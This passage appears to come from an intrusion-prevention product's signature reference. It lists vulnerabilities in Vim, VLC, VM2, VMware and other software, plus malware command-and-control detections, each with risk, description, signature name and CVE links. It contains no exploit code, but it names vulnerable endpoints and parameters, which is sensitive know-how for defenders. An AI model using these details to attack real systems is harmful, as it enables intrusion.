sgpkg-ips-1455-5242

Platform:

Linux; Unix

Software:

Vim

Type:

Integer Overflow

Description:

A vulnerability in the Vim retab command, Vim versions prior to 8.2.4359, which allows remote attackers to execute by enticing a victim to open a crafted file, due to missing validation when incrementing a buffer index.

Situation:

File-Text_Vim-Retab-Integer-Overflow

References:

CVE-2022-0572
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0572

Vinchin-Backup-And-Recovery-Command-Injection

About this vulnerability:

An attempt to exploit a vulnerability in Vinchin Backup & Recovery detected

Risk:

High

First detected in:

sgpkg-ips-1728-5242

Last changed:

sgpkg-ips-1728-5242

Platform:

Linux; Unix

Software:

Vinchin Backup And Recovery

Type:

Input Validation

Description:

A vulnerability in Vinchin Backup & Recovery, versions before 7.2, which allows remote attackers to execute arbitrary code via the checkIpExists API endpoint due to insufficient input validation.

Situation:

HTTP_CRL-Vinchin-Backup-And-Recovery-Command-Injection

References:

CVE-2023-45498
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45498

Vipa-Controls-Winplc7-Recv-Stack-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in VIPA Controls WinPLC7

Risk:

Moderate

First detected in:

sgpkg-ips-867-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

VIPA Controls WinPLC7

Type:

Input Validation

Description:

A stack-based buffer overflow exists in VIPA Controls WinPLC7. The vulnerability is due to improper validation of a length field within received TCP packet data before copying the contents to a stack-based buffer. A remote attacker could exploit this vulnerability by sending maliciously crafted TPKT payloads via TCP to the vulnerable application. Successful exploitation could result in denial of service conditions or, in the worst case, arbitrary code execution in the context of the user running the application.

Situation:

Generic_CS-Vipa-Controls-Winplc7-Recv-Stack-Based-Buffer-Overflow

References:

CVE-2017-5177
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5177

ViperSoftX-C2-Traffic

About this vulnerability:	ViperSoftX command and control traffic
Risk:	High
First detected in:	sgpkg-ips-1754-5242
Last changed:	sgpkg-ips-1844-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	ViperSoftX is a remote access trojan with information exfiltration capabilities.
Situation:	File-Text_ViperSoftX-Script-Content HTTP_CSH-ViperSoftX-C2-Traffic

Virut-Malware-C2-Traffic

About this vulnerability:	Virut malware C2 traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1093-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Virut is a malicious botnet coupled with a component that infects executable files on Windows computer (and file shares). In addition, Virut is a malware dropper and has been observed to download several malicious executables, such as spam bots. Furthermore, Virut may download any other arbitrary malicious executable at any time and imposes a high security risk. Virut bots organize in a centralized botnet.
Situation:	Generic_SS-Virut-Malware-C2-Traffic Generic_CS-Virut-Malware-C2-Traffic File-Text_Virut-Malware-C2-Traffic

Visam-Vbase-Automation-Base-Gestureconfigurations-External-Entity-Injection

About this vulnerability:

A vulnerability in VISAM VBASE Automation Base

Risk:

Moderate

First detected in:

sgpkg-ips-1623-5242

Last changed:

sgpkg-ips-1623-5242

Platform:

Generic

Software:

VISAM VBASE

Type:

Input Validation

Description:

An XXE vulnerability exists in VISAM VBASE Automation Base. The vulnerability is due to insufficient validation of XML data when parsing the GestureConfigurations.xml file. A remote attacker could exploit this vulnerability by enticing a user to open a maliciously crafted file. Successful exploitation could lead to information disclosure.

Situation:

File-TextId_Visam-Vbase-Automation-Base-Gestureconfigurations-External-Entity-Injection

References:

CVE-2022-46300
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46300

Visam-Vbase-Automation-Base-Layersettings-External-Entity-Injection

About this vulnerability:

A vulnerability in VISAM VBASE Automation Base

Risk:

Moderate

First detected in:

sgpkg-ips-1631-5242

Last changed:

sgpkg-ips-1631-5242

Platform:

Generic

Software:

VISAM VBASE

Type:

Input Validation

Description:

An XXE vulnerability exists in VISAM VBASE Automation Base. The vulnerability is due to insufficient validation of XML data when parsing the LayerSettings.xml file. A remote attacker could exploit this vulnerability by enticing a user to open a maliciously crafted file. Successful exploitation could lead to information disclosure.

Situation:

File-TextId_Visam-Vbase-Automation-Base-Layersettings-External-Entity-Injection

References:

CVE-2022-45468
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45468

Visam-Vbase-Automation-Base-Projektinfo-File-Parsing-External-Entity-Injection

About this vulnerability:

A vulnerability in VISAM VBASE Automation Base

Risk:

Moderate

First detected in:

sgpkg-ips-1650-5242

Last changed:

sgpkg-ips-1650-5242

Platform:

Generic

Software:

VISAM VBASE

Type:

Input Validation

Description:

An XXE vulnerability exists in VISAM VBASE Automation Base. The vulnerability is due to insufficient validation of XML data when parsing the ProjektInfo.xml file. A remote attacker could exploit this vulnerability by enticing a user to open a maliciously crafted file. Successful exploitation could lead to information disclosure.

Situation:

File-TextId_Visam-Vbase-Automation-Base-Projektinfo-File-Parsing-External-Entity-Injection

References:

CVE-2022-45876
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45876

Visam-Vbase-Automation-Base-Webremote-File-Parsing-External-Entity-Injection

About this vulnerability:

A vulnerability in VISAM VBASE Automation Base

Risk:

Moderate

First detected in:

sgpkg-ips-1622-5242

Last changed:

sgpkg-ips-1622-5242

Platform:

Generic

Software:

VISAM VBASE

Type:

Input Validation

Description:

An XXE vulnerability exists in VISAM VBASE Automation Base. The vulnerability is due to insufficient validation of XML data when parsing WebRemote.xml file. A remote attacker could exploit this vulnerability by enticing a user to open a maliciously crafted file. Successful exploitation could lead to information disclosure.

Situation:

File-TextId_Visam-Vbase-Automation-Base-Webremote-File-Parsing-External-Entity-Injection

References:

CVE-2022-46286
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46286

Viscom-Software-Image-Viewer-ActiveX-Tifmergemultifiles-Buffer-Overflow

About this vulnerability:	A vulnerability in Viscom Software Image Viewer CP Gold ActiveX Control
Risk:	Moderate
First detected in:	sgpkg-ips-427-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Viscom Image Viewer
Type:	Buffer Overflow
Description:	There is a buffer overflow vulnerability in Viscom Software Image Viewer ActiveX Control. The vulnerability is due to a boundary error when handling the function call TIFMergeMultiFiles() with an overly long parameter. A remote attacker can leverage this vulnerability by enticing a target user to open a crafted HTML page. Successful exploitation would allow an attacker to execute arbitrary code in the security context of the logged in user. An unsuccessful attack could cause an abnormal termination of the affected product.
Situation:	File-Text_Viscom-Image-Viewer-ActiveX-Tifmergemultifiles-Buffer-Overflow

Visual-Basic-Script-ShellCode-Generation

About this vulnerability:	Suspicious Visual Basic Script code
Risk:	Moderate
First detected in:	sgpkg-ips-115-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Internet Explorer
Type:	Malfunction
Description:	Visual Basic Script is a powerful programming language that is embedded into Microsoft Internet Explorer. It can be used to generate and hide shellcode that is used in exploits against the browser.
Situation:	HTTP_SS-Visual-Basic-Script-ShellCode-Generation File-Text_Visual-Basic-Script-ShellCode-Generation

Visual-IRC-JOIN-Command-Response-Handling-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Visual IRC

Risk:

Moderate

First detected in:

sgpkg-ips-114-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Visual IRC

Type:

Buffer Overflow

Description:

Visual IRC has a stack-based buffer overflow vulnerability in the handling of overly long responses to the JOIN command. A successful exploit leads to a denial of service terminating the affected service or arbitrary code execution with the privileges of the currently logged in user.

Situation:

Generic_Visual-IRC-JOIN-Command-Response-Handling-Buffer-Overflow

References:

CVE-2007-3612
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3612

BID-24798
http://www.securityfocus.com/bid/24798

OSVDB-37888
http://www.osvdb.org/37888

Visual-Mining-Netcharts-Server-Admin-Console-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in Visual Mining NetCharts Server

Risk:

Moderate

First detected in:

sgpkg-ips-616-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Visual Mining NetCharts

Type:

Input Validation

Description:

An arbitrary file upload vulnerability has been reported in Visual Mining NetCharts Server. The vulnerability exists in the Admin console and is due to insufficient validation of filename during the upload process. A remote attacker can exploit this vulnerability to execute arbitrary code on the affected system by uploading arbitrary files to certain locations. The remote attacker must be authenticated prior to exploiting the vulnerability, however default credentials can be used in order to by-pass the authentication.

Situation:

HTTP_CS-Visual-Mining-Netcharts-Server-Admin-Console-Arbitrary-File-Upload

References:

CVE-2014-8516
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8516

OSVDB-114127
http://www.osvdb.org/114127

Visual-Mining-Netcharts-Server-File-Upload-Directory-Traversal

About this vulnerability:	A vulnerability in Visual Mining NetCharts Server
Risk:	Moderate
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Visual Mining NetCharts
Type:	Directory Traversal
Description:	A directory traversal vulnerability has been reported in Visual Mining NetCharts Server. The vulnerability is due to insufficient validation of file paths during the upload process. A remote attacker can exploit this vulnerability to execute arbitrary code on the affected system by uploading arbitrary files to certain locations.
Situation:	HTTP_CS-Visual-Mining-Netcharts-Server-File-Upload-Directory-Traversal

Visual-Mining-Netcharts-Server-Projectcontents-File-Rename-Denial-Of-Service

About this vulnerability:

A vulnerability in Visual Mining NetCharts Server

Risk:

Moderate

First detected in:

sgpkg-ips-650-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Visual Mining NetCharts Server

Type:

Directory Traversal

Description:

A denial of service condition vulnerability has been reported in Visual Mining NetCharts Server projectContents.jsp page. The vulnerability is due to arbitrary directory traversal when renaming a file. A remote attacker can exploit this vulnerability by sending a crafted HTTP request to rename important files. Successful exploitation would create a denial of service condition.

Situation:

HTTP_CRL-Visual-Mining-Netcharts-Server-Projectcontents-File-Rename-Denial-Of-Service

References:

CVE-2015-4032
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4032

OSVDB-122480
http://www.osvdb.org/122480

Visual-Mining-Netcharts-Server-Savefile.jsp-Page-Directory-Traversal

About this vulnerability:

A vulnerability in Visual Mining NetCharts Server

Risk:

High

First detected in:

sgpkg-ips-650-5211

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

Visual Mining NetCharts Server

Type:

Directory Traversal

Description:

An arbitrary file upload vulnerability has been reported in Visual Mining NetCharts Server. The vulnerability is due to lack of sanitization on a remotely supplied parameter within the saveFile.jsp page. A remote attacker can exploit this vulnerability to execute arbitrary code with SYSTEM privileges on the affected system by uploading arbitrary files to certain locations.

Situation:

HTTP_CRL-Visual-Mining-Netcharts-Server-Savefile.jsp-Page-Directory-Traversal

References:

CVE-2015-4031
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4031

Vjw0rm-Malware-Infection-Traffic

About this vulnerability:	Vjw0rm Malware infection traffic
Risk:	High
First detected in:	sgpkg-ips-1382-5242
Last changed:	sgpkg-ips-1382-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Vjw0rm malware infection traffic was detected.
Situation:	HTTP_CS-Vjw0rm-Malware-Infection-Traffic

VLC-Httpd-Connection-Header-Format-String-RCE

About this vulnerability:	A vulnerability in VLC
Risk:	High
First detected in:	sgpkg-ips-1350-5242
Last changed:	sgpkg-ips-1350-5242
Platform:	Generic
Software:	VideoLAN VLC
Type:	Input Validation
Description:	There exists a vulnerability in VLC, versions before 0.8.6e, which allows remote attackers to execute arbitrary code due to insufficient validation of the Connection header.
Situation:	HTTP_CRH-VLC-Httpd-Connection-Header-Format-String-RCE

VLC-Media-Player-ABC-File-Instruction-Field-Parsing-Heap-Overflow

About this vulnerability:

A vulnerability in libmodplug project libmodplug

Risk:

High

First detected in:

sgpkg-ips-539-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

VideoLAN VLC

Type:

Buffer Overflow

Description:

A remote code execution vulnerability has been reported in the libmodplug library used by VLC Media Player. The vulnerability is due to an error while parsing Instruction fields in ABC files with the style sheet directive "MIDI drum" or "MIDI gchord", which can result in a heap buffer overflow condition. Remote attackers could exploit this vulnerability by enticing the target user to view a malicious ABC file. A successful attack based on this vulnerability may result in the execution of arbitrary code within the security context of the currently logged-in user.

Situation:

File-Text_VLC-Media-Player-ABC-File-Instruction-Field-Parsing-Heap-Overflow

References:

OSVDB-96133
http://www.osvdb.org/96133

VLC-Media-Player-ABC-File-Parts-Field-Parsing-Heap-Integer-Overflow

About this vulnerability:

A vulnerability in libmodplug project libmodplug

Risk:

Moderate

First detected in:

sgpkg-ips-537-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

VideoLAN VLC

Type:

Integer Overflow

Description:

A remote code execution vulnerability has been reported in the libmodplug library used by VLC Media Player. The vulnerability is due to an error while parsing Parts field in ABC files which can result in an integer overflow. A remote attacker can exploit this vulnerability by enticing an unsuspecting user to download and process a malicious file with a vulnerable version of the application.

Situation:

File-Text_VLC-Media-Player-ABC-File-Parts-Field-Parsing-Heap-Integer-Overflow

References:

OSVDB-96133
http://www.osvdb.org/96133

VLC-Media-Player-MMS-Plugin-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in VideoLAN VLC Media Player

Risk:

Moderate

First detected in:

sgpkg-ips-445-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

VideoLAN VLC

Type:

Buffer Overflow

Description:

There is a stack buffer overflow in VLC Media Player. The vulnerability is due to lack of bounds checking while copying a hostname into a stack buffer in the MMS access plugin. A remote attacker can exploit this vulnerability by enticing a user to open a specially crafted URL with a vulnerable version of VLC Media Player. Successful exploitation may allow the attacker to execute arbitrary code on the target user's machine with the privileges of the VLC Media Player process.

Situation:

File-TextId_VLC-Media-Player-MMS-Plugin-Stack-Buffer-Overflow

References:

CVE-2012-1775
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1775

OSVDB-80188
http://www.osvdb.org/80188

VLC-Media-Player-MP4-rdrf-Atom-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in VideoLAN VLC media player

Risk:

High

First detected in:

sgpkg-ips-150-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

VideoLAN VLC

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in VideoLAN VLC media player. A remote attacker can exploit this vulnerability by persuading a user to open a malicious MP4 with a vulnerable version of VideoLAN VLC media player. Successful exploitation could allow the attacker to execute arbitrary code.

Situation:

Shared_SS-VLC-Media-Player-MP4-rdrf-Atom-Buffer-Overflow
File-MPEG_VLC-Media-Player-MP4-rdrf-Atom-Buffer-Overflow

References:

CVE-2008-1489
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1489

BID-28433
http://www.securityfocus.com/bid/28433

OSVDB-43702
http://www.osvdb.org/43702

VLC-Media-Player-ParseJSS-Heap-Buffer-Overflow

About this vulnerability:

A VLC Media Player ParseJSS Heap Buffer Overflow vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-935-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

VideoLAN VLC

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in VideoLAN VLC Media Player, versions prior to 2.2.5.1, which allows remote attackers to execute remote code by crafting a malicious subtitle file.

Situation:

File-Text_VLC-Media-Player-ParseJSS-Heap-Buffer-Overflow

References:

CVE-2017-8311
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8311

VLC-Media-Player-Plugins-Format-String-Vulnerabilities

About this vulnerability:

A vulnerability in VLC Media Player

Risk:

High

First detected in:

sgpkg-ips-581-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

VideoLAN VLC

Type:

Malfunction

Description:

There are multiple format string vulnerabilities in plugins in VideoLAN VLC Media Player that allow remote attackers to cause a denial of service or execute arbitrary code via format string specifiers in an Ogg/Vorbis file, an Ogg/Theora file, a CDDB entry for a CD Digital Audio (CDDA) file, or Service Announce Protocol (SAP) multicast packets.

Situation:

File-Binary_VLC-Media-Player-Plugins-Format-String-Vulnerabilities

References:

CVE-2007-3316
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3316

BID-24555
http://www.securityfocus.com/bid/24555

OSVDB-37382
http://www.osvdb.org/37382

OSVDB-37381
http://www.osvdb.org/37381

OSVDB-37380
http://www.osvdb.org/37380

OSVDB-37379
http://www.osvdb.org/37379

VLC-Media-Player-RTSP-Plugin-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Live555 liblivemedia

Risk:

Low

First detected in:

sgpkg-ips-560-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

VideoLAN VLC

Type:

Buffer Overflow

Description:

A stack buffer overflow exists in VideoLAN VLC Media Player. The vulnerability is due an error in VLC's embedded Live555 RTSP library, when handling RTSP requests. Incorrect handling of RTSP commands can result in a stack buffer overflow. A remote unauthenticated attacker could exploit this vulnerability by enticing the target user to connect to a malicious RTSP media stream or by opening a malicious playlist file. Successful exploitation could result in arbitrary code execution in the context of the application.

Situation:

Generic_SS-VLC-Media-Player-RTSP-Plugin-Stack-Buffer-Overflow

References:

CVE-2013-6933
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6933

VM2-Sandbox-Protection-Bypass-CVE-2022-36067

About this vulnerability:

An attempt to exploit a vulnerability in VM2 detected

Risk:

High

First detected in:

sgpkg-ips-1582-5242

Last changed:

sgpkg-ips-1582-5242

Platform:

Generic

Software:

VM2

Type:

Input Validation

Description:

VM2 is a sandbox that can run untrusted JavaScript code. In versions prior to version 3.9.11, a threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. This vulnerability was patched in the release of version 3.9.11.

Situation:

File-Text_VM2-Sandbox-Protection-Bypass-CVE-2022-36067

References:

CVE-2022-36067
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36067

VM2-Sandbox-Protection-Bypass-CVE-2023-29017

About this vulnerability:

An attempt to exploit a vulnerability in VM2 detected

Risk:

High

First detected in:

sgpkg-ips-1582-5242

Last changed:

sgpkg-ips-1582-5242

Platform:

Generic

Software:

VM2

Type:

Input Validation

Description:

VM22 is a JavaScript sandbox that can run untrusted code with whitelisted NodeJS built-in modules. In versions prior to version 3.9.11, a threat actor can bypass the sandbox protections to gain remote code execution rights on the host.

Situation:

File-Text_VM2-Sandbox-Protection-Bypass-CVE-2023-29017

References:

CVE-2023-29017
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29017

VM2-Sandbox-Protection-Bypass-CVE-2023-30547

About this vulnerability:

An attempt to exploit a vulnerability in VM2 detected

Risk:

High

First detected in:

sgpkg-ips-1583-5242

Last changed:

sgpkg-ips-1583-5242

Platform:

Generic

Software:

VM2

Type:

Input Validation

Description:

There exists a vulnerability in exception sanitization of VM2 for versions up to 3.9.16. It allows attackers to raise an unsanitized host exception inside "handleException()" which can be used to escape the sandbox and run arbitrary code in host context.

Situation:

File-Text_VM2-Sandbox-Protection-Bypass-CVE-2023-30547

References:

CVE-2023-30547
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30547

VM2-Sandbox-Protection-Bypass-With-Code-Transformer-CVE-2023-29199

About this vulnerability:

An attempt to exploit a vulnerability in VM2 detected

Risk:

High

First detected in:

sgpkg-ips-1582-5242

Last changed:

sgpkg-ips-1582-5242

Platform:

Generic

Software:

VM2

Type:

Input Validation

Description:

There exists a vulnerability in the source code transformer (exception sanitization logic) of VM2 for versions up to 3.9.15. It allows attackers to bypass "handleException()" checks and leak unsanitized host exceptions, which can be used to escape the sandbox and run arbitrary code in host context.

Situation:

File-Text_VM2-Sandbox-Protection-Bypass-With-Code-Transformer-CVE-2023-29199

References:

CVE-2023-29199
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29199

VMTurbo-Operations-Manager-Remote-Command-Execution

About this vulnerability:

A VMTurbo Operations Manager Remote Command Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-698-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

VMTurbo Operations Manager

Type:

Input Validation

Description:

A vulnerability in VMTurbo Operations Manager, versions before 4.6 build 28657, which allows remote attackers to execute arbitrary commands with shell metacharacters in a DOWN call via the fileDate parameter.

Situation:

HTTP_CRL_VMTurbo-Operations-Manager-Remote-Command-Execution

References:

CVE-2014-5073
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5073

BID-69225
http://www.securityfocus.com/bid/69225

OSVDB-109572
http://www.osvdb.org/109572

VMware-Aria-Operations-For-Logs-Insecure-Deserialization-CVE-2023-20864

About this vulnerability:

A vulnerability in VMWare Aria Operations for Logs

Risk:

High

First detected in:

sgpkg-ips-1583-5242

Last changed:

sgpkg-ips-1583-5242

Platform:

Generic

Software:

VMware Aria Operations for Logs; VMware Cloud Foundation

Type:

Input Validation

Description:

An insecure deserialization vulnerability has been reported in VMware Aria Operations for Logs. The vulnerability is due to improper validation of user data in the InternalClusterController class. A remote unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in arbitrary code execution under the security context of the root user.

Situation:

File-Binary_VMware-Aria-Operations-For-Logs-Insecure-Deserialization-CVE-2023-20864

References:

CVE-2023-20864
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-20864

VMware-Aria-Operations-For-Networks-Command-Injection-CVE-2023-20887

About this vulnerability:

An attempt to exploit a vulnerability in VMware Aria Operations for Networks detected

Risk:

High

First detected in:

sgpkg-ips-1602-5242

Last changed:

sgpkg-ips-1602-5242

Platform:

Generic

Software:

VMware Aria Operations for Networks

Type:

Insecure Configuration

Description:

This vulnerability allows remote attackers to execute arbitrary code on affected installations of VMware Aria Operations for Networks. Authentication is not required to exploit this vulnerability. The specific flaw exists within the "createSupportBundle" method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root.

Situation:

HTTP_CRL-VMware-Aria-Operations-For-Networks-Command-Injection-CVE-2023-20887

References:

CVE-2023-20887
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-20887

VMware-Aria-Operations-For-Networks-Exportpdf-Code-Injection

About this vulnerability:

A vulnerability in VMWare Aria Operations for Networks

Risk:

Moderate

First detected in:

sgpkg-ips-1647-5242

Last changed:

sgpkg-ips-1647-5242

Platform:

Generic

Software:

VMware Aria Operations for Networks

Type:

Input Validation

Description:

Missing input validation for JavaScript code in exportPDF method causes a code injection vulnerability in VMware Aria. A successful exploit allows an attacker to gain access to information on the target system.

Situation:

HTTP_CS-VMware-Aria-Operations-For-Networks-Exportpdf-Code-Injection

References:

CVE-2023-20889
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-20889

VMware-Aria-Operations-For-Networks-Login-Banner-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in VMWare Aria Operations for Networks

Risk:

Moderate

First detected in:

sgpkg-ips-1699-5242

Last changed:

sgpkg-ips-1699-5242

Platform:

Generic

Software:

VMware Aria Operations for Networks

Type:

Input Validation

Description:

Improper validation of user input used in the login banner causes a cross-site scripting vulnerability in VMWare Aria Operations for Networks. A successful exploitation allows an attacker to execute arbitrary scripts on a user's browser.

Situation:

HTTP_CRL-VMware-Aria-Operations-For-Networks-Login-Banner-Stored-Cross-Site-Scripting

References:

CVE-2024-22241
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-22241

VMware-Aria-Operations-For-Networks-Savefiletodisk-Directory-Traversal

About this vulnerability:

A vulnerability in VMware Aria Operations for Networks

Risk:

High

First detected in:

sgpkg-ips-1632-5242

Last changed:

sgpkg-ips-1632-5242

Platform:

Generic

Software:

VMware Aria Operations for Networks

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in VMware Aria Operations for Networks. The vulnerability is due to improper validation of file names in user requests when uploading device configuration files. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target appliance. Successful exploitation could result in arbitrary code execution under the security context of the root user.

Situation:

HTTP_CS-VMware-Aria-Operations-For-Networks-Savefiletodisk-Directory-Traversal

References:

CVE-2023-20890
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-20890

VMware-Authorization-Service-User-Credential-Parsing-DOS

About this vulnerability:

VMware Authorization Service User Credential Parsing Denial of Service

Risk:

Moderate

First detected in:

sgpkg-ips-259-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EMC VMware Player; EMC VMware Workstation

Type:

Malfunction

Description:

A denial of service vulnerability has been reported in the authorization service of some VMware products. The flaw is due to a design error when processing login requests. An attacker can exploit this vulnerability by supplying malicious USER or PASS strings to the target host. Successful exploitation would result on the termination of the "vmware-authd" process causing a denial of service condition.

Situation:

Generic_CS-VMware-Authorization-Service-User-Credential-Parsing-DOS
Generic_CS-VMware-Authorization-Service-User-Credential-Parsing-DOS-2

References:

BID-36630
http://www.securityfocus.com/bid/36630

VMware-Cloud-Director-Remote-Code-Execution

About this vulnerability:

A vulnerability in VMware Cloud Director

Risk:

High

First detected in:

sgpkg-ips-1350-5242

Last changed:

sgpkg-ips-1350-5242

Platform:

Generic

Software:

VMware Cloud Foundation

Type:

Input Validation

Description:

There exists a vulnerability in VMware Cloud Director, versions 10.0.x before 10.0.0.2, 9.7.0.x before 9.7.0.5, 9.5.0.x before 9.5.0.6, 9.1.0.x before 9.1.0.4, which allows remote attackers to execute arbitrary code due to the insufficient input validation to root:Host.

Situation:

HTTP_CS-VMware-Cloud-Director-Remote-Code-Execution

References:

CVE-2020-3956
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3956

VMware-Com-API-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in VMware VMware COM API ActiveX control

Risk:

High

First detected in:

sgpkg-ips-165-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

EMC VMware ESX Server; EMC VMware GSX Server

Type:

Malfunction

Description:

There is a buffer overflow vulnerability in the VMware COM API ActiveX control. The vulnerability is due to improper error handling when processing arguments passed to the GuestInfo() method of an ActiveX Control. A remote attacker can exploit the vulnerability by enticing the target user to visit a malicious web page. A successful exploitation may allow for arbitrary code injection and execution.

Situation:

HTTP_SS-VMware-Com-API-ActiveX-Control-Buffer-Overflow
File-Text_VMware-Com-API-ActiveX-Control-Buffer-Overflow

References:

CVE-2008-3892
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3892

BID-30934
http://www.securityfocus.com/bid/30934

VMware-ESX-And-ESXi-Server-Soap-Request-Handling-Denial-Of-Service

About this vulnerability:

A vulnerability in VMWare ESX

Risk:

High

First detected in:

sgpkg-ips-498-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EMC VMware ESX Server; EMC VMware ESXi Server

Type:

Input Validation

Description:

A denial of service vulnerability exists in VMware ESX and ESXi server. The vulnerability is due to improper handling of certain SOAP requests in the vSphere API. A remote unauthenticated attacker could exploit this vulnerability by sending specially crafted messages to the affected server. Successful exploitation would result in a denial of service condition.

Situation:

HTTP_CS-VMware-ESX-And-ESXi-Server-Soap-Request-Handling-Denial-Of-Service

References:

CVE-2012-5703
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5703

BID-56571
http://www.securityfocus.com/bid/56571

OSVDB-87539
http://www.osvdb.org/87539

VMware-ESXi-Authentication-Bypass-CVE-2024-37085

About this vulnerability:

An attempt to exploit a vulnerability in EMC VMware ESXi Server detected

Risk:

High

First detected in:

sgpkg-ips-1767-5242

Last changed:

sgpkg-ips-1767-5242

Platform:

Windows

Software:

EMC VMware ESXi Server

Type:

Input Validation

Description:

VMware ESXi contains an authentication bypass vulnerability. A malicious actor with sufficient Active Directory (AD) permissions can gain full access to an ESXi host that was previously configured to use AD for user management by re-creating the configured AD group ('ESXi Admins' by default) after it was deleted from AD.

Situation:

SMB-TCP_VMware-ESXi-Authentication-Bypass-CVE-2024-37085

References:

CVE-2024-37085
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37085

VMware-ESXi-Remote-Code-Execution-CVE-2021-21974

About this vulnerability:

A vulnerability in VMware ESXi

Risk:

High

First detected in:

sgpkg-ips-1553-5242

Last changed:

sgpkg-ips-1553-5242

Platform:

Generic

Software:

VMware ESXi

Type:

Buffer Overflow

Description:

A remote code execution vulnerability has been reported in the OpenSLP component of the VMWare ESXi server.

Situation:

Generic_CS-VMware-ESXi-Remote-Code-Execution-CVE-2021-21974

References:

CVE-2021-21974
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21974

VMware-Fusion-Guest-VM-Remote-Code-Execution

About this vulnerability:

A vulnerability in VMWare Fusion

Risk:

Moderate

First detected in:

sgpkg-ips-1150-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

VMware Fusion

Type:

Malfunction

Description:

There has been reported a remote code execution vulnerability in VMWare Fusion. Opening a specially crafted website is required to exploit this vulnerability. Successful exploitation could lead in arbitrary code execution.

Situation:

File-Text_VMware-Fusion-Guest-VM-Remote-Code-Execution

References:

CVE-2019-5514
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5514

VMware-HCX-Listextensions-SQL-Injection

About this vulnerability:

A vulnerability in VMWare HCX

Risk:

Moderate

First detected in:

sgpkg-ips-1844-5242

Last changed:

sgpkg-ips-1844-5242

Platform:

Generic

Software:

VMWare HCX

Type:

Input Validation

Description:

Improper input validation in the listExtensions method in VMWare HCX causes an SQL injection vulnerability. A successful exploitation allows an attacker to execute arbitrary SQL on the target server.

Situation:

